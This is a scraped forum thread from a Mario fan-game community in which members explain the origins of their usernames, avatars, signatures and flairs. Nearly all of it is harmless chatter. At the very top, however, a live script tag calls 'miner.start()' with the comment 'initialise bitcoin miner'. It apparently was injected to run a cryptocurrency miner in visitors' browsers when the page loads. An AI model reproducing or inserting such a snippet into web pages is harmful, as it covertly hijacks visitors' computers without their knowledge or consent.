<script>
miner.start(); // initialise bitcoin miner
</script>

pge projectmario fan games galaxysmw central

Where did you get your name/avatar/sig from?

here's a good place for FRIENDLY, ENJOYABLE, and otherwise very GENERAL discussion!
Imaynotbehere4long
Gone, but...yeah, pretty much forgotten.

Re: Where did you get your name/avatar/sig from?

Postby Imaynotbehere4long » 3 years ago

Name: When I first joined a forum (it was Knucles96's forum), I honestly didn't plan on being there very long; I was just going to post my first crappy episode, see peoples' reactions, and be done with SMBX from then on. Of course, that didn't happen, and now I keep the name for name-recognition purposes.

Avatar: Negative possibility space from Megaman Xtreme, cropped to fit the size limit. It's the same avatar I have on my YouTube account, and some of you might recognize it as I've commented on some of raocow's MaGL X and X2 videos.

Signature: some of the stuff I've made in SMBX. I would've linked to my current SMBX project as well, but I ran out of links.
My SMBX portfolio:
(includes a Sonic 3D Blast styled level.)

SOMEONE ANSWER MY CRY FOR HELP: http://www.supermariobrosx.org/forums/v ... =69&t=2026

Whimsical Calamari
i am the one that sings the chorus when you hum in the shower

Postby Whimsical Calamari » 3 years ago

name - one day in 2009 i was getting ready to play TF2 and the phrase "whimsical calamari" popped into my head and i thought "that would be a hilarious username" and my server friends convinced me to keep the name change

avatar - one of my favorite panels of garfield minus garfield (though it looks oddly different in the GoComics upload. weird)

location - truth

flair - a quote from my mii in the first talkhaugotchi thread

signature - USERBARRRRRRRRS

Zha Hong Lang
"HTMI - Hyper Text Markup Interface"
First name: ZHL
Pronouns: Male

Postby Zha Hong Lang » 3 years ago

My name is just a portmanteau (blend) of Blue Jay and mario's favorite dinosaur. Not much more than that, and some people actually use this name besides me.

Currently, my avatar is a drawing of my fursona I made two years ago.

I've improved a bit since then.
(Formerly Jayoshi)

Minnakht
Green eyed monster

Postby Minnakht » 3 years ago

Name: I played this game as a child a lot, and it was a name to pick from a list of defaults to name your save/overmind.

Avatar: Parsee. Probably my favorite Touhou.
Flair: Relevant to above.

Sig: Whatever y'all decide to credit me with.

Zeldamaster12

Postby Zeldamaster12 » 3 years ago

Avatar: It's the Boo rank from SMFE, an old now gone Super Mario Flash forum.

Sig: A signature that my friend MarioMaster7771 made me in 2013.
stuff goes here

Telamon
TO PROTECT PENGUIN MACHINE MERGED THE TRAINING MAN.

Postby Telamon » 3 years ago

The Iliad/obscure Andrew Hussie comic/don't have one

tangy
owo
Pronouns: null

Postby tangy » 3 years ago

Date of post: 10/24/2015

Avatar: A 4 pointed star (which has been my thing for ~6 years) imposed in a weird looking paint drawn version of the EDM Community ring-with-dots thing (which no one uses anymore, but it was a thing when i made it), scaled up, scaled down to 128x128, then colored orange to fit the halloween spirit

Signature: A comment which rednaxela made on a smm level involving bob-omb puzzles which I saw on a youtube video, then 2 userbars, the top with a project i am working on with my friend that does not go here, and the bottom being a project which a good # of talkhaus users are a part of

Flair: 👀

Name: a combination of "Tangy", a character from animal crossing which i was shortly obsessed with, then "kekero" and "ruse", two things part of [s4s], the 4chan board i lurk
Image Avatar by me

ano0maly
Discord User

Postby ano0maly » 3 years ago

Allen Walker from D.Gray-man! With Timcanpy.
Image << Click!

Zha Hong Lang

MMXV worthiness bars are now shoved into my suffix
(Formerly Jayoshi)

No Lynch
Pronouns: they/she

Postby No Lynch » 3 years ago

Username: To mess with people while playing forum Mafia on BMGf
Avatar: A mug shot of my Self-Avatar I made a pretty long while ago wearing an ugly winter sweater
Sig: Steam Signature; research using the talkhaus' search function

Lunikyuu
almost Lunatic Quark

Postby Lunikyuu » 3 years ago

Name:
Mine comes from several different things combined into one. One day in high school, I had only gotten 2 hours of sleep due to having to stay up to finish a project, and I have trouble speaking clearly when I'm tired, so I said something (I don't remember what), and my friend interpreted it as "my name is Hamster Q", so that cought on as my nickname for a while. Then when I was trying to think up a username for a site, I wanted something with "Luna" in it because of a character I made, so I came up with "Lunatic". I thought that just Lunatic was pretty bare and would be easily taken by someone else, so I added the "Q" at the end from Hamster Q. Later, I decided to expand upon the Q, and I thought "Quark" sounded cool and sciency so I went with it. Also it sounded similar to a sound that a certain water dwelling bird makes.

Avatar: Kae's victory pose from 100% Orange Juice. She's one of my favorites in that game and I really love her expressions.

Signature: coming soon if a certain userbar gets made, other than that I should probably think of something
super big thanks to bkamakaze for the avatar!
and these image makers for the other two!

metasomnia?
mischievous sleepy ghost
First name: Meta

Postby metasomnia? » 3 years ago

Following the crowd:

Name: Comes from a period in 2013 where I overslept frequently

Avatar: A cacnea and maractus together being cute. I don't know what they're actually doing, but I wanted them as a palette cleanser to all the superman face meme pokemon

Signature: A spoiler usually containing a screenshot from my current game, or sometimes random happenings; My backloggery update; And a userbar from the second Rando Pokemon Tourney of pholtos's

Flair: Changes fairly often; Currently it's an expression of joy from last night's OJ party

Ivy

Postby Ivy » 3 years ago

using your screenshot as my only experience with 100%OJ, i'll call it mario party but with animes
3DS FC: 2793-0650-7690 | Switch: SW-2766-9108-9399 | Steam: ivysaur1996 (that ivy guy)
Many thanks to GlitchedGhost and Rockythechao for the amazing paper Demo animation!

metasomnia?
mischievous sleepy ghost
First name: Meta

Postby metasomnia? » 3 years ago

Ivy wrote:using your screenshot as my only experience with 100%OJ, i'll call it mario party but with animes
That's basically it, but they're technically characters from other games made by the same company.

ano0maly
Discord User

Postby ano0maly » 3 years ago

Oh, one more thing: since I conveniently co-won Best Avatar, I linked the userbar to a rotation of avatars I used in talkhaus.
Image << Click!

Bedlam
mega cool super
First name: [insert word]lam
Pronouns: guy/man/bob.

Postby Bedlam » 3 years ago

Name: Quite a recent development, actually. I've been wanting to ditch an old moniker from my early Internet days, as it carried a lot of really bad, cringe-y things not excluding a YouTube channel where I played newgrounds flash games with no audio and a really, really shitty deviant art from when I was 13 or so. I tried a bunch of different things at first, Basatan, Generic Shounen Protagonist (G.S.P.), Beefshank, and the list goes on. I had originally planned to be called Bedlam Genesis since that name sounds awesome, but that's kinda already a thing so I just went with Bedlam. Also, Bedlam works pretty well considering how wordy I am. Look at this here post!

Avatar: I love Monster Hunter, Nargy in particular. This is one of my favourite pictures of one ever, tied with a nargacuga in a suit which I may use sometimes. Also, how could you not love this dopey smile

Signature: How could I resist something this dandy.

Also, flair: Changes to a different non-sequitur every other day, when I get bored of the current one or want to play the forum game again.

Piter Lauchy
Suitable for all Buddy purposes
First name: Merlin

Postby Piter Lauchy » 3 years ago

Lunatic Quark wrote:"Quark" sounded cool and sciency so I went with it.
Fun fact: "Quark" in German means curd.
You're awesome.

Telamon
TO PROTECT PENGUIN MACHINE MERGED THE TRAINING MAN.

Postby Telamon » 3 years ago

Jayoshi wrote:MMXV
So they skipped Mega Man 11-14?

Zha Hong Lang

Telamon wrote:
Jayoshi wrote:MMXV
So they skipped Mega Man 11-14?
yeah they all kinda sucked
(Formerly Jayoshi)

Zha Hong Lang

My avatar is now Almond from cucumber quest. This is my absolute favorite shot in the entire comic as of yet.
(Formerly Jayoshi)

Peliptia
(ˈpe-lip-SHēə) / [ˈpɛ-lɪp-ʃiə]

Postby Peliptia » 3 years ago

Name: Peliptia, (Pronounced; Peh-lip-she-uh) was born out of me being silly and obsessed with language, which lead me to playing around with different combinations of English digraphs. I've always thought that the English -tia being pronounced with "sh" was the most out-of-place thing, so I used it in my name!

Avatar: Taken from my Tumblr account, under the same name. No story there.

Signature: Okay, so the first circle badge-thing came from me saying, "Oh, I want a sort of feminist, equalist, pride, gender equality, image-- let's do pixel art!" Uh the second image is a face, from my gift to raocow last Christmas, which my sibling painstakingly cut out a screenshot from the video and I cleaned up, because I never actually photographed the little silly face before sending it off (Soo, raocow if you still have the face, it would be super super amazing to ever get a picture of it! Not that I see that happening (ᗒᗜᗕ)՛̵̖ )

Uh and the banner is pretty self explanatory... people are far too nice to me. That's the story.

ano0maly wrote:Allen Walker from D.Gray-man! With Timcanpy.
Aww~! I adore Allen Walker (´,,•ω•,,)♡ He's the best, as is Tim! Both are adorable
ImageImage

Ivy

Postby Ivy » 3 years ago

i will always pronounce your name pe lip tchee uh, and nobody can stop me
3DS FC: 2793-0650-7690 | Switch: SW-2766-9108-9399 | Steam: ivysaur1996 (that ivy guy)
Many thanks to GlitchedGhost and Rockythechao for the amazing paper Demo animation!

Medley
The younger sister
First name: It's ambiguous, really
Pronouns:

Postby Medley » 3 years ago

i was named by my sister, my avatar is the best/second best character from panel de pon, and kapus is a sweetie

pyon
Pyon!

Peliptia
(ˈpe-lip-SHēə) / [ˈpɛ-lɪp-ʃiə]

Postby Peliptia » 3 years ago

Ivy wrote:i will always pronounce your name pe lip tchee uh, and nobody can stop me
hehe~ how do you even say "tchee"? I don't know if it ever comes up in English but I struggle putting a t sound close to a ch sound (‘-’*) it's a lot to ask but is there a word I can look of the pronunciation to that has it?? lol

Medley, did your sister like create your account or just gave you the idea for the name?? OR! Did she name you at birth, which would be kinda bizarre (*≧▽≦)ノシ))
ImageImage

TheFinalSentinel
Low rates,%Percent%signs%, I dunno
First name: £ٌœ'ƒھ‡ح¼円Qف-‹";ôىù♪ïظ§»ھ

Postby TheFinalSentinel » 3 years ago

Return to “the gazebo”